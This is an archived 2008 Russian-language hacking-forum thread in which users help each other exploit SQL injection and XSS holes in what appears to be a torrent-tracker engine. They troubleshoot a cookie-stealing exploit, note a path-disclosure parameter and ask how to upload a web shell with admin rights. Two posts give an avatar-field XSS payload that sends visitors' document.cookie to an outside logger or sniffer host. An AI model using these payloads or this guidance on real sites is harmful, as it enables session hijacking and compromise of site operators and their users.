ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
19.12.2008, 20:23
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Сообщение от OMG!!
Qwazar, там оленизмом страдает народ.. я в чате написал, друзья .. как залатать дыры от этих багов, и ссылку на ачат кинул.. в итоге словил бан с ризоном " в чате помощи не просят"  зафига тогда чат.. оффтоп. вообщем, спасибо.. буду искать Ну у них же там на главной написано
Вот, в общем, топик где были предложены их исправления. Имхо нифига не элегантно и порой избыточно, но: http://bit-torrent.kiev.ua/bnovlenie...ex.html?t=3319
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
20.12.2008, 16:51
|
|
Banned
Регистрация: 09.12.2008
Сообщений: 142
Провел на форуме:
504278
Репутация:
114
|
|
У меня при использовании сполйта пишет что неверные куки, pass incorect, хотя всё правильно. ЧТо не так?
|
|
|
|
20.12.2008, 17:04
|
|
Познающий
Регистрация: 19.11.2007
Сообщений: 81
Провел на форуме:
509730
Репутация:
52
|
|
Arigona
Посмотри чтоб в конце адресса был слеш!
http://target.com/ 1 bla bla
у меня именно в слеше была проблема!
|
|
|
|
20.12.2008, 17:15
|
|
Banned
Регистрация: 09.12.2008
Сообщений: 142
Провел на форуме:
504278
Репутация:
114
|
|
Тоже самое 
Trying to get your cookies... Can't get cookies.. Pass incorrect? |
|
|
|
20.12.2008, 17:53
|
|
Новичок
Регистрация: 20.11.2008
Сообщений: 10
Провел на форуме:
54375
Репутация:
16
|
|
Сообщение от Dimazzan
Эта штука не пашет!!!
все прекрасно пашет, читай ман по SQL, разве не видиш что ругается на синтаксис ? значит скуля есть, тоько ты пишеш не правельно! Вообщем патч хендс
з.ы. если прочтеш внимательно мой пост с багой то там написано ПРИМЕР, тоесть это пример конкретно для сайта на котором это проделывал я, у вас и версия SQL может быть другая и путь другой, как найти путь написано в этой же теме, поэтому если у вас не хватает знаний чтобы заюзать багу, то не нужно кричать что она не пашет!
Последний раз редактировалось злойдядька; 20.12.2008 в 17:58..
|
|
|
|
20.12.2008, 19:36
|
|
Banned
Регистрация: 09.12.2008
Сообщений: 142
Провел на форуме:
504278
Репутация:
114
|
|
А вот у меня сломало и соль, для чего она и как её использовать?
|
|
|
|
20.12.2008, 22:04
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122
Репутация:
2438
|
|
В настройках профиля во вкладке аватар можно реализовать XSS:
Код:
http://host.org/1.jpg onload= location.href='http://host.org/log.php?c='+document.cookie;//
|
|
|
|
21.12.2008, 09:44
|
|
Banned
Регистрация: 09.12.2008
Сообщений: 142
Провел на форуме:
504278
Репутация:
114
|
|
Qwazar, понял.
А возможно реализовть сплоит под другую sql уязвимость? У многих нет requests.php просто..
вот раскрытый путь обнаружил:
details.php?id[]=
мне кажеться тут что-то скрывается |
|
|
|
21.12.2008, 11:13
|
|
Banned
Регистрация: 09.12.2008
Сообщений: 142
Провел на форуме:
504278
Репутация:
114
|
|
baltazar, как?
ВОт если я пользуюсь снифером na-s.ru
http://google/1.jpg onload= location.href='http://na-s.ru/limage.jpg?c='+document.cookie;//
Правильно?
|
|
|
|
21.12.2008, 16:11
|
|
Banned
Регистрация: 09.12.2008
Сообщений: 142
Провел на форуме:
504278
Репутация:
114
|
|
Как можно загрузить шелл имея админа? Реально такое?
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
